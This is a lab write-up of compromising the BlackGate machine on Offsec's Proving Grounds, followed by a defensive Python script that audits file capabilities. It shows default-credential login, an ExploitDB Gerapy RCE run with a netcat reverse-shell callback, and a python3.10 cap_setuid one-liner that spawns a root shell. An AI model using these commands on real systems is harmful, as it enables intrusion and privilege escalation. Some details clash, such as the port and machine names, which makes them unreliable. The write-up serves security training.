As always in a penetration testing engagement, we start with reconnaissance and information gathering: in this step we try to learn as much about the target as possible.
We do that with a variety of tools and techniques (enumeration, port scanning and other recon) so that we can later obtain a foothold on the target.
In this lab we are tasked with pentesting the Linux machine BlackGate on Offsec's Proving Grounds.
The first step is to check that the target is up and reachable. We can do that by sending ICMP echo requests with the following command:
ping 192.168.204.24
Next I'll run rustscan to quickly scan for open ports:
┌──(root💀CSEC)-[/home/cyborgbytes/Documents/PGWriteupsOffsec/Levram]
└─# rustscan -a 192.168.204.24 --ulimit 5000
Afterwards we can see the output as follows:

From the scan I can see that there are two open ports:
Port 22
and
Port 8000
Going to the webpage on port 22, I find a login page, and apparently I can log in with the default credentials:
admin — admin
While on the login page I noticed the CMS is called Gerapy. After using searchsploit to search the ExploitDB database, I found that there is an exploit for this platform, which also ties back to the service running on port 8000:
WSGIServer 0.2 (Python 3.10.6)
I ran searchsploit with the CMS name Gerapy:
The exploit is an authenticated RCE, and since we are already authenticated in the platform I expect the exploit to work:

Before I run the exploit, I'll start a listener with netcat:
nc -lnvp 9001
Next I'll run the exploit as follows:
┌──(root💀CSEC)-[/home/cyborgbytes/Documents/PGWriteupsOffsec/Levram]
└─# python 50640.py -t 192.168.204.24 -p 8000 -L 192.168.45.181 -P 9001
Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.
And BOOM! We got a shell!

And here we get the user flag. Let's proceed to root.
I'll run linpeas for privilege escalation. I prefer linpeas because it makes it easier to find PE vectors, and it's automated!
linpeas reports that /usr/bin/python3.10 has the file capability cap_setuid=ep, which is a very likely PE vector.
Next is finding out how to exploit it:
By running the following command I can spawn a root shell easily:
/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'
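The root cause here is a file capability on an interpreter: anyone who can run /usr/bin/python3.10 gets cap_setuid for free. As an added example (not part of this writeup or of linpeas), the following audit parses the output of getcap -r / and flags binaries whose capabilities allow privilege escalation, rating interpreters with an effective setuid/setgid-class capability as HIGH; the getcap lines below are constructed sample data, not from the lab host.

```python
import os
import re

# Constructed sample of `getcap -r / 2>/dev/null` output for the audit below.
# Both libcap output styles are included; these lines are not from the lab host.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/perl = cap_setuid,cap_setgid+eip
/usr/sbin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/ruby cap_dac_read_search+p
"""
# Capabilities that let a process cross its own UID/GID or filesystem boundary.
PRIVESC_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
                "cap_dac_override", "cap_dac_read_search", "cap_sys_module", "cap_chown"}
# Interpreters: any user who can run them can use the capability on demand.
INTERPRETERS = ("python", "perl", "ruby", "node", "php", "lua", "bash", "sh")

def parse_getcap_line(line):
    """Return (path, set_of_caps, flags) for one getcap line, or None."""
    parts = line.split()
    if len(parts) < 2:
        return None
    path = parts[0]
    spec = parts[-1]  # e.g. "cap_setuid,cap_setgid+eip" or "cap_net_raw=ep"
    m = re.match(r"([a-z_,]+)[=+]([eip]*)$", spec)
    if not m:
        return None
    return path, set(m.group(1).split(",")), m.group(2)

def audit_capabilities(getcap_output):
    """Flag binaries whose file capabilities allow privilege escalation."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps, flags = parsed
        risky = sorted(caps & PRIVESC_CAPS)
        if not risky:
            continue
        stem = re.match(r"[a-z]+", os.path.basename(path))  # "python3.10" -> "python"
        is_interp = bool(stem) and stem.group(0) in INTERPRETERS
        # Effective ("e") privesc capability on an interpreter is a one-liner to root;
        # permitted-only ("p") or a non-interpreter binary still deserves a review.
        severity = "HIGH" if is_interp and "e" in flags else "MEDIUM"
        findings.append({"path": path, "caps": risky, "flags": flags, "severity": severity})
    return findings
```

Run audit_capabilities on the real getcap -r / 2>/dev/null output of a host; a HIGH finding is exactly the condition linpeas flagged above, and the fix is setcap -r on the binary (or a dedicated wrapper that drops the capability after use) rather than granting it to the interpreter itself.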